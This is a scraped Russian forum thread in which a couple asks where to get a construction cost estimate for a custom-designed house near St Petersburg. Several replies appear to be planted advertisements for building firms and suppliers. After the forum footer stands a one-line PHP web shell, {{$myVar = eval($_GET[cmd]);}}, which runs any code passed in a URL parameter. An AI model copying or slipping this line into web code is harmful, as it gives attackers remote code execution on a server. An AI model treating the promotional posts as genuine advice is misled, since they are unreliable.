+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Дом по своему проекту


  1. #1

    Дом по своему проекту

    В общем мы с женой уже очень давно откладывали средства на строительство загородного дома под Питером. Готовые проекты которые мы видели в разных строительный компаний нас как-то не устраивали и мы решили нанять фрилансера который сможет сделать 3Д модель дома по нашим требованиям. Теперь необходимо узнать стоимость строительства данного проекта, но куда или к кому за этим обращаться?

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Вы сначала найдите строительную компанию, которая будет готова взять за ваш проект. Так как большинство строительных компаний ограничиваются лишь своими материалами, например какая-та компания строит дома исключительно из бруса, другая из пеноблоков. В общем, строительная компания сама составит смету)

  3. #3
    Я бы так сильно не доверял бы строительным компаниям, так как их много и некоторые буквально наживаются на клиентах подменяя реальные цифры в сметной документации. В общем, если хотите, что бы вас не обманули, аккуратно выбирайте строительную компанию.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    На мой взгляд, лучше всего доверить разработку проектно сметной документации сторонней компании, которая никак не будет заинтересована как либо обмануть своего клиента. Вот одна из компаний в которую можно за этим обратиться - http://cesp.spb.ru/uslugi/sostavleni...-documentacii/ , в случае, если все же строительная компания составит свою сметную документацию, то данная компания может ее проверить на наличие ошибок или подвоха.

  5. #5
    Мимо проходил Leha-Leshiy is on a distinguished road Аватар для Leha-Leshiy
    Регистрация
    21.02.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    Дом по своему проекту ? Интересно. Я уже и забыл, как этот проект делать да и что там нужно

  6. #6
    Мимо проходил Djomid is on a distinguished road Аватар для Djomid
    Регистрация
    29.02.2016
    Откуда
    Мск
    Машина
    Бричка
    Сообщений
    23
    Цитата Сообщение от Leha-Leshiy Посмотреть сообщение
    Дом по своему проекту ? Интересно. Я уже и забыл, как этот проект делать да и что там нужно
    А вот у нас только стройка завершилась. Именно по своему проекту. Отлично вышло, кстати. Я доволен. В ходе строительства была использована и задвижка с обрезиненным клином гранар. Самострой да ещё и по собственному чертежу - горжусь !

  7. #7
    Мимо проходил Машка is on a distinguished road Аватар для Машка
    Регистрация
    25.08.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    При строительстве дома вам понадобятся строительные материалы. Для этого можете вот сюда обратиться https://stroysnb.ru/peskogrunt. Там их продают по очень выгодным ценам и качество отличное. Мы там заказывали, когда строили дом, поэтому знаю.

  8. #8
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    ищем проверенную строительную компанию в Крыму, куда стоит обратиться?

  9. #9
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Компания Голд Строй ЖК" https://голдстрой.рус/ – не просто подрядчик, а надёжный партнер в строительстве. Профессиональный и ответственный подход к каждой детали проекта поражает. Их дизайнеры предложили разнообразные и стильные варианты, соответствующие современным тенденциям. Качество материалов и строительства на высшем уровне, поэтому уверен, вы тоже с ними сработаетесь.

  10. #10
    Мимо проходил Artur22 is on a distinguished road Аватар для Artur22
    Регистрация
    29.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Сейчас много кто предлагает такие услуги, но лучше по реальным отзывам выбирать

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}